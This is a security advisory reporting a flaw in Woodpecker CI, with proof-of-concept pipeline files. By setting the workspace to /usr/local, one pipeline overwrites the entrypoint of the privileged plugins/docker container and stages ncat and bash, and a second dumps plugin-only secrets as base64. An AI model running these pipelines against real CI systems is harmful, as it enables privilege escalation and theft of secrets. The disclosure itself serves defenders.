Getting "privileged permissions" / "secrets value" by using (... an escalated plugin and/) by adjusting workspace

[6543]

Getting privileged permissions using an escalated plugin by adjusting workspace

Dear Woodpecker Security Team,

I am writing to inform you about the possibility of running arbitrary code in a privileged container using the default configuration.
As you know, the default configuration has multiple containers that run in privileged mode. These include the "plugins/docker" image. (I haven't looked at the other images, though I'm sure they are vulnerable to the same or similar exploits.)
My POC uses the workspace attribute with the base set to "/use/local". This way, I can place a file at "/usr/local/bin/dockerd-entrypoint.sh" in a step before the "plugins/docker" step to overwrite the commands executed in the privileged container.

workspace:
  base: /usr/local/

steps:
- name: prepare
  image: alpine
  commands:
    - mkdir -p /usr/local/bin/
    - cp fake-local/bin/dockerd-entrypoint.sh /usr/local/bin/dockerd-entrypoint.sh
    - cp ncat /usr/local/ncat
    - cp bash /usr/local/bash
    - chmod +x /usr/local/bin/dockerd-entrypoint.sh
    - chmod +x /usr/local/ncat
    - chmod +x /usr/local/bash
- name: drone
  image: plugins/docker

This is possible because the only things checked before allowing the setting of the container to privileged are that the "Commands" and "Entrypoint" attributes are unset using the "IsPlugin" function.
There are multiple other ways to gain code execution in the privileged container, such as setting environment variables like "LD_PRELOAD".

I only tested this in the docker runner, but looking at the code, the same should be possible for the kubernetes runner.

I'm not sure how to fix this correctly, as it is broken by design when allowing the building of docker images inside the CI.

Similar bugs exist in the Drone CI, so a scheduled disclosure with them makes sense.

I am also informing you that I am the author of a CTF Challenge where people tried to find and exploit this bug. The event was a final to a qualification with a small number of participants. Two Teams solved the challenge by finding other bugs. I will tell them to report their found vulnerability as well.

Feel free to follow up with any questions.

Best,
Daniel Kilimnik

Neodyme AG

---

Getting secrets value using manipulated entrypoint via adjusted workspace

1. create a secret called TOKEN for the plugin plugins/docker only

2. create this pipeline

skip_clone: true

workspace:
  base: /usr/local/

steps:
- name: prepare
  image: alpine
  commands:
    - mkdir -p /usr/local/bin/
    - 'echo "#!/bin/sh" > /usr/local/bin/dockerd-entrypoint.sh'
    - 'echo "env" >> /usr/local/bin/dockerd-entrypoint.sh'
    - 'echo "echo -------" >> /usr/local/bin/dockerd-entrypoint.sh'
    - 'echo "env | base64" >> /usr/local/bin/dockerd-entrypoint.sh'
    - chmod +x /usr/local/bin/dockerd-entrypoint.sh
- name: drone
  image: plugins/docker
  settings:
    token:
      from_secret: TOKEN

3. decode the base64 and wolla successfully reused the exploid in a different area

---

GHSA-xw35-rrcp-g7xm